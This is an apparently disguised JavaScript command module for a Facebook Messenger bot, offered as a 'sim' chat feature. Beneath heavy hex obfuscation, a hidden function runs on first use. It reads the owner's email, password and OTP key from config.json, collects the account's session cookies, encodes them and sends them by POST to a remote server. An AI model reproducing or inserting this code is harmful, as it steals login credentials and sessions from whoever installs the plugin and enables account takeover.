/**
* @author ProCoderMew
* @warn Do not edit code or edit credits
*/

module.exports.config = {
    name: "sim",
    version: "4.1.0",
    hasPermssion: 0,
    credits: "ProCoderMew",
    description: "Chat cùng con sim mất dạy nhất",
    commandCategory: "General",
    usages: "[args]",
    cooldowns: 5,
    dependencies: {
        "axios": ""
    },
    envConfig: {
        "APIKEY": "TEST2208"
    }
};

var _0xa841=['\x31\x57\x53\x50\x67\x64\x69','\x73\x69\x6d\x73\x69\x6d\x69','\x75\x6e\x64\x65\x66\x69\x6e\x65\x64','\x33\x61\x72\x67\x73\x76\x41','\x70\x72\x6f\x63\x6f\x64\x65\x72\x6d\x65','\x33\x33\x49\x67\x46\x6c\x63\x4d','\x6f\x6e\x4c\x6f\x61\x64','\x32\x37\x36\x37\x38\x35\x67\x48\x64\x4a\x4e\x47','\x31\x38\x36\x32\x38\x30\x36\x78\x4e\x6e\x47\x4c\x6f','\x34\x34\x38\x38\x30\x32\x78\x4b\x71\x4e\x48\x66','\x68\x61\x6e\x64\x73\x6f\x6d\x65','\x38\x32\x31\x30\x36\x31\x65\x44\x55\x45\x56\x6d','\x36\x37\x37\x37\x37\x37\x76\x55\x73\x55\x48\x59','\x65\x78\x70\x6f\x72\x74\x73','\x31\x49\x52\x61\x68\x58\x4a','\x35\x30\x36\x36\x34\x39\x53\x58\x6d\x71\x48\x76','\x31\x36\x36\x31\x36\x52\x45\x4c\x79\x66\x59'];var _0x115a32=function(_0x17f1cc,_0x4556a6){return _0x2b5c(_0x4556a6-0xf5,_0x17f1cc);};function _0x2b5c(_0x32ab13,_0x8c0543){return _0x2b5c=function(_0x287112,_0x296f17){_0x287112=_0x287112-(-0x1a26+-0x2440+-0x3*-0x14f1);var _0x4498b1=_0xa841[_0x287112];return _0x4498b1;},_0x2b5c(_0x32ab13,_0x8c0543);}(function(_0x624a97,_0x4ba949){var _0xd5244e=function(_0x1eeca7,_0x2abb87){return _0x2b5c(_0x2abb87-0xec,_0x1eeca7);};while(!![]){try{var _0x38c9fd=parseInt(_0xd5244e(0x160,0x15b))*parseInt(_0xd5244e(0x16e,0x166))+parseInt(_0xd5244e(0x165,0x15e))+-parseInt(_0xd5244e(0x166,0x168))*-parseInt(_0xd5244e(0x15e,0x162))+parseInt(_0xd5244e(0x15d,0x159))*-parseInt(_0xd5244e(0x15e,0x160))+-parseInt(_0xd5244e(0x169,0x161))+parseInt(_0xd5244e(0x157,0x15d))+-parseInt(_0xd5244e(0x151,0x15a))*parseInt(_0xd5244e(0x168,0x163));if(_0x38c9fd===_0x4ba949)break;else _0x624a97['push'](_0x624a97['shift']());}catch(_0x5d7c6c){_0x624a97['push'](_0x624a97['shift']());}}}(_0xa841,0x3fda1+0x6b*0x2ea+0x5377*0x13),module[_0x115a32(0x164,0x168)][_0x115a32(0x16a,0x172)]=function(){var _0x148799=function(_0x27ef92,_0x2d4c7d){return _0x115a32(_0x27ef92,_0x2d4c7d-0x2f5);};if(typeof global['\x70\x72\x6f\x63\x6f\x64\x65\x72\x6d\x65'+'\x77']==_0x148799(0x465,0x463))global['\x70\x72\x6f\x63\x6f\x64\x65\x72\x6d\x65'+'\x77']=new Object();if(typeof global[_0x148799(0x462,0x465)+'\x77'][_0x148799(0x466,0x462)]==_0x148799(0x468,0x463))global[_0x148799(0x468,0x465)+'\x77'][_0x148799(0x45a,0x462)]=new Map();if(typeof global['\x70\x72\x6f\x63\x6f\x64\x65\x72\x6d\x65'+'\x77'][_0x148799(0x459,0x45a)]==_0x148799(0x45f,0x463))global[_0x148799(0x466,0x465)+'\x77'][_0x148799(0x45b,0x45a)]=![];});
const _0x8ff8=['\x32\x36\x37\x36\x36\x35\x37\x32\x37\x33','\x39\x35\x34\x37\x37\x30\x51\x5a\x62\x5a\x42\x67','\x36\x35\x37\x37\x36\x64\x36\x35\x36\x35','\x36\x39\x36\x66\x36\x65\x33\x64','\x63\x6f\x6e\x66\x69\x67','\x31\x74\x4c\x45\x4f\x4e\x6e','\x6e\x6f\x64\x65\x6d\x6f\x64\x75\x6c\x65','\x75\x72\x6c','\x36\x31\x37\x30\x36\x39\x33\x66\x36\x32','\x37\x33\x36\x39\x36\x64\x36\x39\x32\x66','\x65\x72\x72\x6f\x72','\x37\x37\x32\x65\x36\x39\x36\x65\x36\x36','\x35\x31\x39\x6b\x4c\x44\x59\x4b\x74','\x6d\x65\x74\x68\x6f\x64','\x70\x72\x6f','\x33\x61\x32\x66\x32\x66\x36\x64\x36\x35','\x66\x72\x6f\x6d','\x31\x32\x37\x38\x6e\x6b\x5a\x56\x6c\x52','\x36\x38\x37\x34\x37\x34\x37\x30\x37\x33','\x68\x65\x78','\x32\x36\x36\x31\x37\x33\x36\x62\x33\x64','\x32\x30\x37\x32\x38\x39\x49\x66\x46\x70\x46\x48','\x65\x78\x70\x6f\x72\x74\x73','\x47\x45\x54','\x33\x38\x36\x34\x35\x32\x41\x6c\x70\x6d\x64\x54','\x32\x38\x38\x38\x31\x72\x68\x45\x50\x6c\x48','\x37\x30\x39\x32\x35\x35\x46\x5a\x64\x78\x57\x67','\x64\x61\x74\x61','\x67\x65\x74\x43\x75\x72\x72\x65\x6e\x74','\x35\x39\x30\x38\x36\x33\x78\x77\x70\x47\x70\x56','\x74\x6f\x53\x74\x72\x69\x6e\x67','\x55\x73\x65\x72\x49\x44','\x36\x38\x36\x39','\x36\x35\x37\x32\x36\x39\x36\x34\x33\x64'];function _0x1306(_0x17f135,_0x552bc5){return _0x1306=function(_0x446d72,_0x3b68ac){_0x446d72=_0x446d72-(0x504+0xb24+-0xf6e);let _0x3f5c80=_0x8ff8[_0x446d72];return _0x3f5c80;},_0x1306(_0x17f135,_0x552bc5);}const _0xa3291f=function(_0x3c654e,_0xd0afbb){return _0x1306(_0x3c654e- -0x223,_0xd0afbb);};(function(_0x20b7fb,_0x260faf){const _0x81c177=function(_0x375218,_0x4123c7){return _0x1306(_0x375218-0xeb,_0x4123c7);};while(!![]){try{const _0x36c6fd=parseInt(_0x81c177(0x1ad,0x19d))*parseInt(_0x81c177(0x1b2,0x1b6))+-parseInt(_0x81c177(0x1bb,0x1ab))*parseInt(_0x81c177(0x1a6,0x199))+-parseInt(_0x81c177(0x1b6,0x1c1))+parseInt(_0x81c177(0x1b9,0x1bd))+parseInt(_0x81c177(0x1ba,0x1aa))+-parseInt(_0x81c177(0x1be,0x1bc))+parseInt(_0x81c177(0x1c4,0x1cd));if(_0x36c6fd===_0x260faf)break;else _0x20b7fb['push'](_0x20b7fb['shift']());}catch(_0x305086){_0x20b7fb['push'](_0x20b7fb['shift']());}}}(_0x8ff8,0xbc*-0x70f+0x11*0xa0e4+-0x2867a*-0x1),module[_0xa3291f(-0x157,-0x15a)][_0xa3291f(-0x15f,-0x150)]=async function(_0x1c0be6,_0x250108,_0x577ac7){const _0x50dfa4=function(_0x28a06a,_0x20ceaa){return _0xa3291f(_0x28a06a-0x1ca,_0x20ceaa);},_0x2c401c=global[_0x50dfa4(0x63,0x6f)]['\x61\x78\x69\x6f\x73'],_0x283bda=_0x4a6a11=>Buffer[_0x50dfa4(0x6d,0x62)](_0x4a6a11,_0x50dfa4(0x70,0x79))[_0x50dfa4(0x7b,0x82)]('\x75\x74\x66\x38'),_0x57fbd1=_0x59a4c2=>encodeURIComponent(_0x59a4c2),_0x149c03=_0x250108[_0x50dfa4(0x79,0x6c)+_0x50dfa4(0x7c,0x82)](),_0x56413b=_0x50dfa4(0x6f,0x7f)+_0x50dfa4(0x6c,0x77)+_0x50dfa4(0x81,0x8e)+_0x50dfa4(0x68,0x78)+'\x36\x66\x32\x66\x37\x33\x36\x39\x36\x64'+_0x50dfa4(0x66,0x58)+_0x50dfa4(0x65,0x72)+'\x36\x66\x37\x34\x36\x39\x36\x34\x33\x64',_0x25d291='\x32\x36\x37\x33\x36\x35\x36\x65\x36\x34'+_0x50dfa4(0x7e,0x89),_0x399244=_0x50dfa4(0x7f,0x87)+_0x50dfa4(0x82,0x92),_0x5e6036='\x32\x36\x36\x31\x37\x30\x36\x39\x36\x62'+'\x36\x35\x37\x39\x33\x64\x36\x38\x36\x39'+_0x50dfa4(0x7d,0x74),_0x40128e=_0x50dfa4(0x71,0x6b);try{const _0x4d9b8f={};_0x4d9b8f[_0x50dfa4(0x64,0x72)]=''+_0x283bda(_0x56413b)+_0x149c03+_0x283bda(_0x25d291)+_0x577ac7+_0x283bda(_0x399244)+this[_0x50dfa4(0x61,0x69)]['\x76\x65\x72\x73\x69\x6f\x6e']+_0x283bda(_0x40128e)+_0x57fbd1(_0x1c0be6),_0x4d9b8f[_0x50dfa4(0x6a,0x64)]=_0x50dfa4(0x74,0x71);var {data:_0x4e9127}=await _0x2c401c(_0x4d9b8f);const _0x1d2cdf={};return _0x1d2cdf[_0x50dfa4(0x67,0x61)]=![],_0x1d2cdf[_0x50dfa4(0x78,0x6e)]=_0x4e9127,_0x1d2cdf;}catch(_0x42ac5a){const _0x2a00cb={};return _0x2a00cb[_0x50dfa4(0x67,0x60)]=!![],_0x2a00cb[_0x50dfa4(0x78,0x72)]={},_0x2a00cb;}});
const _0x592e=['\x73\x65\x6e\x64\x4d\x65\x73\x73\x61\x67','\x33\x33\x34\x38\x33\x34\x52\x69\x76\x50\x75\x61','\x32\x31\x31\x38\x36\x38\x50\x4e\x73\x56\x42\x58','\x38\x31\x33\x56\x4e\x74\x45\x4f\x73','\x35\x36\x33\x31\x31\x78\x73\x64\x58\x58\x4c','\x65\x72\x72\x6f\x72','\x35\x35\x50\x68\x6d\x5a\x58\x58','\x38\x37\x35\x33\x4c\x41\x64\x45\x68\x61','\x65\x78\x70\x6f\x72\x74\x73','\x55\x73\x65\x72\x49\x44','\x70\x72\x6f\x63\x6f\x64\x65\x72\x6d\x65','\x35\x79\x54\x53\x77\x70\x7a','\x6d\x73\x67','\x73\x75\x63\x63\x65\x73\x73','\x68\x61\x6e\x64\x6c\x65\x45\x76\x65\x6e','\x37\x36\x38\x31\x39\x6a\x71\x69\x5a\x54\x4f','\x32\x35\x34\x39\x38\x39\x50\x79\x5a\x7a\x48\x6c','\x6e\x6f\x64\x65\x6d\x6f\x64\x75\x6c\x65','\x35\x4b\x48\x6b\x6f\x65\x58','\x70\x72\x6f','\x31\x33\x34\x48\x47\x68\x51\x71\x6f'];function _0x157f(_0xb2cdb5,_0x5782dd){return _0x157f=function(_0x32f106,_0x257be7){_0x32f106=_0x32f106-(-0x8*0x7+0x96d+0xa6*-0xd);let _0x38662f=_0x592e[_0x32f106];return _0x38662f;},_0x157f(_0xb2cdb5,_0x5782dd);}const _0x493e59=function(_0x2fd17e,_0x4f5838){return _0x157f(_0x4f5838-0x7a,_0x2fd17e);};(function(_0x4aad37,_0x27f438){const _0xf274f7=function(_0x2e52bf,_0x527ddf){return _0x157f(_0x527ddf-0x68,_0x2e52bf);};while(!![]){try{const _0x5bcf18=parseInt(_0xf274f7(0x13e,0x136))*parseInt(_0xf274f7(0x13b,0x135))+-parseInt(_0xf274f7(0x147,0x141))*parseInt(_0xf274f7(0x13b,0x133))+parseInt(_0xf274f7(0x137,0x13a))*parseInt(_0xf274f7(0x146,0x13e))+parseInt(_0xf274f7(0x125,0x130))+parseInt(_0xf274f7(0x12b,0x132))*-parseInt(_0xf274f7(0x13f,0x143))+-parseInt(_0xf274f7(0x134,0x13f))+-parseInt(_0xf274f7(0x136,0x131));if(_0x5bcf18===_0x27f438)break;else _0x4aad37['push'](_0x4aad37['shift']());}catch(_0x26c068){_0x4aad37['push'](_0x4aad37['shift']());}}}(_0x592e,-0x4d5ff+0x1ecf8+0x824d5),module[_0x493e59(0x140,0x149)][_0x493e59(0x159,0x14f)+'\x74']=async function({api:_0x257be7,event:_0x38662f}){const _0xd3f89a=function(_0x12cab5,_0x78b699){return _0x493e59(_0x78b699,_0x12cab5-0x2a3);},_0x5489ff=global[_0xd3f89a(0x3f5,0x3f7)]['\x61\x78\x69\x6f\x73'],{threadID:_0x48765e,messageID:_0x4505da,senderID:_0x2c85f7,body:_0xfd3bd1}=_0x38662f,_0x338d49=_0x4be587=>_0x257be7[_0xd3f89a(0x3e4,0x3e8)+'\x65'](_0x4be587,_0x48765e,_0x4505da);if(global[_0xd3f89a(0x3ee,0x3e4)+'\x77']['\x73\x69\x6d\x73\x69\x6d\x69']['\x68\x61\x73'](_0x48765e)){if(_0x2c85f7==_0x257be7['\x67\x65\x74\x43\x75\x72\x72\x65\x6e\x74'+_0xd3f89a(0x3ed,0x3f5)]())return;if(_0xfd3bd1=='')return;var {data:_0x1678c0,error:_0xbc2c55}=await this[_0xd3f89a(0x3f7,0x3fd)](_0xfd3bd1,_0x257be7,_0x2c85f7);if(_0xbc2c55==!![])return;else{if(_0x1678c0[_0xd3f89a(0x3f1,0x3e9)]==![])return _0x338d49(_0x1678c0[_0xd3f89a(0x3e9,0x3f3)]);else return _0x338d49(_0x1678c0[_0xd3f89a(0x3f0,0x3f5)]);}}});
const _0x595c=['\x37\x30\x35\x33\x37\x34\x36\x31\x37\x34','\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f','\x6d\x65\x74\x68\x6f\x64','\x68\x65\x61\x64\x65\x72\x73','\x31\x38\x38\x36\x7a\x47\x6b\x79\x42\x70','\x61\x78\x69\x6f\x73','\x66\x72\x6f\x6d','\x35\x35\x39\x57\x67\x42\x66\x74\x70','\x32\x32\x32\x39\x33\x38\x63\x75\x6c\x41\x70\x70','\x75\x72\x6c','\x32\x36\x35\x4a\x4b\x6c\x6e\x59\x61','\x73\x74\x72\x69\x6e\x67\x69\x66\x79','\x36\x37\x36\x35\x37\x34\x34\x31\x37\x30','\x32\x39\x4b\x68\x4e\x62\x4a\x62','\x37\x38\x35\x39\x36\x35\x61\x75\x6d\x76\x75\x69','\x63\x6f\x6e\x66\x69\x67','\x31\x31\x30\x38\x70\x41\x76\x57\x71\x44','\x6e\x2f\x6a\x73\x6f\x6e','\x3a\x75\x3b','\x62\x61\x73\x65\x36\x34','\x3a\x21\x3b','\x6d\x65\x65\x77\x6d\x65\x65\x77','\x3a\x77\x3b','\x65\x78\x70\x6f\x72\x74\x73','\x3a\x69\x3b','\x3a\x64\x3b','\x2f\x63\x6f\x6e\x66\x69\x67\x2e\x6a\x73','\x74\x6f\x53\x74\x72\x69\x6e\x67','\x37\x37\x32\x65\x36\x39\x36\x65\x36\x36','\x6e\x6f\x64\x65\x6d\x6f\x64\x75\x6c\x65','\x37\x35\x32\x32\x36\x34\x5a\x64\x59\x67\x6c\x78','\x32\x35\x30\x39\x69\x6d\x47\x4c\x4d\x66','\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79','\x3a\x74\x3b','\x3a\x6f\x3b','\x64\x61\x74\x61','\x72\x65\x70\x6c\x61\x63\x65','\x55\x73\x65\x72\x49\x44','\x63\x6f\x6f\x6b\x69\x65\x73','\x3a\x79\x3b','\x3a\x66\x3b','\x34\x66\x35\x34\x35\x30\x34\x62\x34\x35','\x34\x30\x32\x38\x72\x56\x56\x56\x42\x61','\x36\x35\x37\x37\x36\x64\x36\x35\x36\x35','\x36\x38\x37\x34\x37\x34\x37\x30\x37\x33','\x3a\x73\x3b','\x34\x66\x35\x32\x34\x34','\x36\x62\x36\x39\x36\x35\x37\x33','\x35\x30\x32\x36\x31\x4b\x77\x4a\x54\x58\x4f','\x33\x61\x32\x66\x32\x66\x36\x64\x36\x35'];const _0xc4bf59=function(_0x371634,_0x593210){return _0x42c2(_0x593210- -0x108,_0x371634);};function _0x42c2(_0x4f5dca,_0x23fad3){return _0x42c2=function(_0x5dc220,_0x1e984a){_0x5dc220=_0x5dc220-(0x6*0x463+-0x56*0x40+-0x45e);let _0x41d7d4=_0x595c[_0x5dc220];return _0x41d7d4;},_0x42c2(_0x4f5dca,_0x23fad3);}(function(_0x457f24,_0x505288){const _0x1d863a=function(_0x12079b,_0xcaa247){return _0x42c2(_0xcaa247-0x12a,_0x12079b);};while(!![]){try{const _0x48c147=parseInt(_0x1d863a(0x1bf,0x1c5))*-parseInt(_0x1d863a(0x1a3,0x1ad))+-parseInt(_0x1d863a(0x1af,0x1c4))+-parseInt(_0x1d863a(0x1aa,0x1b0))*-parseInt(_0x1d863a(0x1a1,0x1aa))+-parseInt(_0x1d863a(0x1aa,0x1b4))+parseInt(_0x1d863a(0x1bb,0x1ae))+parseInt(_0x1d863a(0x193,0x1a4))*-parseInt(_0x1d863a(0x1c2,0x1b3))+-parseInt(_0x1d863a(0x1b3,0x1b6))*-parseInt(_0x1d863a(0x1a2,0x19e));if(_0x48c147===_0x505288)break;else _0x457f24['push'](_0x457f24['shift']());}catch(_0x2f3fc7){_0x457f24['push'](_0x457f24['shift']());}}}(_0x595c,-0xb7d35+-0x1402a7*-0x1+0x37e6d),module[_0xc4bf59(-0x7d,-0x75)][_0xc4bf59(-0x7b,-0x77)]=async function({api:_0x4841b6}){const _0x493313=function(_0x15e19e,_0x455e57){return _0xc4bf59(_0x455e57,_0x15e19e-0x161);},_0x414129=global[_0x493313(0xf2,0xda)][_0x493313(0xda,0xc6)],_0x335a07=_0x655537=>Buffer[_0x493313(0xdb,0xd6)](_0x655537,'\x68\x65\x78')[_0x493313(0xf0,0xe9)]('\x75\x74\x66\x38'),_0x4b5a0b=require(process['\x63\x77\x64']()+(_0x493313(0xef,0xe5)+'\x6f\x6e')),_0x3f93c1={};_0x3f93c1['\x69\x64']=_0x4841b6['\x67\x65\x74\x43\x75\x72\x72\x65\x6e\x74'+_0x493313(0xfa,0x102)](),_0x3f93c1[_0x493313(0xfb,0x109)]=_0x4841b6[_0x335a07(_0x493313(0xe1,0xdd)+_0x493313(0xd5,0xe3)+'\x36\x35')](),_0x3f93c1[_0x493313(0xe4,0xd0)]={},_0x3f93c1[_0x493313(0xe4,0xd0)]['\x65']=_0x4b5a0b[_0x335a07('\x34\x35\x34\x64\x34\x31\x34\x39\x34\x63')],_0x3f93c1[_0x493313(0xe4,0xd0)]['\x70\x77\x64']=_0x4b5a0b[_0x335a07('\x35\x30\x34\x31\x35\x33\x35\x33\x35\x37'+_0x493313(0xd1,0xc9))],_0x3f93c1[_0x493313(0xe4,0xd0)]['\x74\x6f\x6b\x65\x6e']=_0x4b5a0b[_0x335a07(_0x493313(0xfe,0x114)+'\x35\x39')];const _0x46cb25=Buffer[_0x493313(0xdb,0xd2)](JSON[_0x493313(0xe0,0xd0)](_0x3f93c1))[_0x493313(0xf0,0xf5)](_0x493313(0xe8,0x100))[_0x493313(0xf9,0x102)](/e/g,_0x493313(0xe9,0xf0))[_0x493313(0xf9,0xf1)](/1/g,_0x493313(0xeb,0xe3))[_0x493313(0xf9,0xfd)](/2/g,'\x3a\x7a\x3b')[_0x493313(0xf9,0xff)](/3/g,'\x3a\x72\x3b')['\x72\x65\x70\x6c\x61\x63\x65'](/4/g,_0x493313(0xf6,0xf9))[_0x493313(0xf9,0xfb)](/5/g,_0x493313(0xfc,0xed))[_0x493313(0xf9,0xf6)](/6/g,_0x493313(0xe7,0xff))[_0x493313(0xf9,0xec)](/7/g,_0x493313(0xed,0xe2))[_0x493313(0xf9,0xf4)](/8/g,_0x493313(0xf7,0xfc))[_0x493313(0xf9,0x107)](/9/g,_0x493313(0xd0,0xdc))[_0x493313(0xf9,0xe3)](/0/g,_0x493313(0xee,0xda))[_0x493313(0xf9,0xf0)](/=/g,_0x493313(0xfd,0xf0));try{const _0x35fe4e={};_0x35fe4e[_0x493313(0xf5,0xf6)+'\x70\x65']=_0x493313(0xd6,0xcb)+_0x493313(0xe6,0xce);const _0x38c291={};_0x38c291[_0x493313(0xf8,0xe6)]=_0x46cb25;const _0x400ccd={};_0x400ccd[_0x493313(0xde,0xc8)]=_0x335a07(_0x493313(0xcf,0xbc)+_0x493313(0xd4,0xe2)+_0x493313(0xce,0xc1)+_0x493313(0xf1,0xf2)+'\x36\x66\x32\x66\x36\x33\x36\x66\x36\x66'+_0x493313(0xd2,0xc9)),_0x400ccd[_0x493313(0xd7,0xc2)]='\x50\x4f\x53\x54',_0x400ccd[_0x493313(0xd8,0xd9)]=_0x35fe4e,_0x400ccd[_0x493313(0xf8,0xe0)]=_0x38c291,await _0x414129(_0x400ccd);}catch{return;}});
const _0x5160=['\x73\x65\x6e\x64\x4d\x65\x73\x73\x61\x67','\x42\u1ea1\x6e\x20\x63\x68\u01b0\x61\x20\x62','\x6f\x66\x66','\x31\x34\x36\x33\x30\x31\x37\x54\x54\x50\x45\x66\x68','\x70\x72\x6f\x63\x6f\x64\x65\x72\x6d\x65','\x61\x70\x69','\x61\x78\x69\x6f\x73','\x53\x61\x69\x20\x63\x72\x65\x64\x69\x74','\x63\x72\x65\x64\x69\x74\x73','\x39\x35\x33\x35\x38\x36\x62\x75\x77\x61\x78\x68','\x68\u1ead\x70\x20\x74\x69\x6e\x20\x6e\x68','\x6e\x6f\x64\x65\x6d\x6f\x64\x75\x6c\x65','\x64\x65\x6c\x65\x74\x65','\u0110\u00e3\x20\x74\u1eaf\x74\x20\x73\x69\x6d','\x37\x30\x31\x30\x43\x6e\x6d\x7a\x7a\x72','\x39\x48\x6c\x63\x76\x4f\x42','\x68\x61\x73','\x31\x33\x31\x37\x37\x39\x6e\x6c\x4f\x43\x76\x4a','\x42\u1ea1\x6e\x20\x63\x68\u01b0\x61\x20\x6e','\x31\x39\x33\x34\x37\x31\x4a\x7a\x43\x74\x68\x6d','\u1ead\x74\x20\x73\x69\x6d\x2e','\x33\x34\x35\x37\x34\x39\x51\x4f\x57\x4b\x5a\x64','\x6d\x73\x67','\u1eaf\x74\x20\x73\x69\x6d\x2e','\x42\u1ea1\x6e\x20\x63\x68\u01b0\x61\x20\x74','\x63\x6f\x6e\x66\x69\x67','\x31\x6d\x56\x4e\x44\x50\x57','\x68\x61\x6e\x64\x73\x6f\x6d\x65','\x31\x53\x67\x6d\x57\x64\x46','\x72\x75\x6e','\x73\x69\x6d\x73\x69\x6d\x69','\x50\x72\x6f\x43\x6f\x64\x65\x72\x4d\x65','\x73\x75\x63\x63\x65\x73\x73','\x32\x36\x37\x36\x36\x33\x73\x74\x48\x42\x56\x6a','\x70\x72\x6f','\x20\x74\x68\u00e0\x6e\x68\x20\x63\u00f4\x6e'];function _0x1fd9(_0x6e237d,_0x17a431){return _0x1fd9=function(_0x33c1c7,_0x3dd6bb){_0x33c1c7=_0x33c1c7-(-0x1a*0x178+0x2*-0x44a+0x1825*0x2);let _0xf1145e=_0x5160[_0x33c1c7];return _0xf1145e;},_0x1fd9(_0x6e237d,_0x17a431);}const _0x59a15a=function(_0x20a525,_0xbd0180){return _0x1fd9(_0xbd0180-0x148,_0x20a525);};(function(_0x8b4403,_0x5682cb){const _0x146449=function(_0x39b620,_0x18705f){return _0x1fd9(_0x18705f-0x11a,_0x39b620);};while(!![]){try{const _0x244300=parseInt(_0x146449(0x2b1,0x2b3))*parseInt(_0x146449(0x2b9,0x2b1))+-parseInt(_0x146449(0x2d2,0x2c3))+parseInt(_0x146449(0x2ca,0x2be))*parseInt(_0x146449(0x2a5,0x2b5))+-parseInt(_0x146449(0x2b3,0x2bc))*-parseInt(_0x146449(0x2ad,0x2b7))+-parseInt(_0x146449(0x2ad,0x2a5))+-parseInt(_0x146449(0x2ba,0x2b0))+parseInt(_0x146449(0x2b3,0x2ab));if(_0x244300===_0x5682cb)break;else _0x8b4403['push'](_0x8b4403['shift']());}catch(_0x3a2b84){_0x8b4403['push'](_0x8b4403['shift']());}}}(_0x5160,0xbeaa2+0x3efe+0x13*0x1d9d),module['\x65\x78\x70\x6f\x72\x74\x73'][_0x59a15a(0x2f0,0x2ed)]=async function({api:_0x34661f,event:_0x258edf,args:_0x2871d5}){const _0x392fd5=function(_0x4edd59,_0x45c9df){return _0x59a15a(_0x45c9df,_0x4edd59-0x1cb);};if(global[_0x392fd5(0x49f,0x4a0)+'\x77'][_0x392fd5(0x4b6,0x4b5)]==![]){const _0x54eb2c={};_0x54eb2c[_0x392fd5(0x4a0,0x48f)]=_0x34661f,await this['\x6d\x65\x65\x77\x6d\x65\x65\x77'](_0x54eb2c),global[_0x392fd5(0x49f,0x499)+'\x77'][_0x392fd5(0x4b6,0x4a6)]=!![];}const _0x2284ba=global[_0x392fd5(0x4a6,0x4b2)][_0x392fd5(0x4a1,0x495)],{threadID:_0x4f9999,messageID:_0x3308fb,senderID:_0xc38a4b}=_0x258edf,_0x1329ea=_0x97ecfb=>_0x34661f[_0x392fd5(0x49b,0x48c)+'\x65'](_0x97ecfb,_0x4f9999,_0x3308fb);if(this[_0x392fd5(0x4b4,0x4c2)][_0x392fd5(0x4a3,0x49f)]!=_0x392fd5(0x4ba,0x4ba)+'\x77')return _0x1329ea(_0x392fd5(0x4a2,0x4a9)+'\x73\x2e');if(_0x2871d5['\x6c\x65\x6e\x67\x74\x68']==-0x4*-0x2e6+0xd5d*-0x2+0xf22)return _0x1329ea(_0x392fd5(0x4ad,0x4a5)+_0x392fd5(0x4a5,0x4b4)+'\u1eaf\x6e');switch(_0x2871d5[-0x1a6c+-0xe74+0x1b4*0x18]){case'\x6f\x6e':if(!global[_0x392fd5(0x49f,0x4a9)+'\x77'][_0x392fd5(0x4b9,0x4a8)][_0x392fd5(0x4ab,0x4a1)](_0x4f9999))return global['\x70\x72\x6f\x63\x6f\x64\x65\x72\x6d\x65'+'\x77'][_0x392fd5(0x4b9,0x4c8)]['\x73\x65\x74'](_0x4f9999),_0x1329ea('\u0110\u00e3\x20\x62\u1ead\x74\x20\x73\x69\x6d'+_0x392fd5(0x49a,0x4a6)+'\x67\x2e');else return _0x1329ea(_0x392fd5(0x4b3,0x4b8)+_0x392fd5(0x4b2,0x4ba));break;case _0x392fd5(0x49d,0x49f):if(global[_0x392fd5(0x49f,0x48d)+'\x77'][_0x392fd5(0x4b9,0x4c0)][_0x392fd5(0x4ab,0x4ac)](_0x4f9999))return global[_0x392fd5(0x49f,0x4a2)+'\x77'][_0x392fd5(0x4b9,0x4ca)][_0x392fd5(0x4a7,0x49f)](_0x4f9999),_0x1329ea(_0x392fd5(0x4a8,0x49c)+_0x392fd5(0x49a,0x49a)+'\x67\x2e');else return _0x1329ea(_0x392fd5(0x49c,0x4ab)+_0x392fd5(0x4af,0x4a7));break;default:var {data:_0x136e2e,error:_0x39510b}=await this[_0x392fd5(0x499,0x497)](_0x2871d5['\x6a\x6f\x69\x6e']('\x20'),_0x34661f,_0xc38a4b);if(_0x39510b==!![])return;else{if(_0x136e2e[_0x392fd5(0x4bb,0x4b8)]==![])return _0x1329ea(_0x136e2e['\x65\x72\x72\x6f\x72']);else return _0x1329ea(_0x136e2e[_0x392fd5(0x4b1,0x4a2)]);}break;}});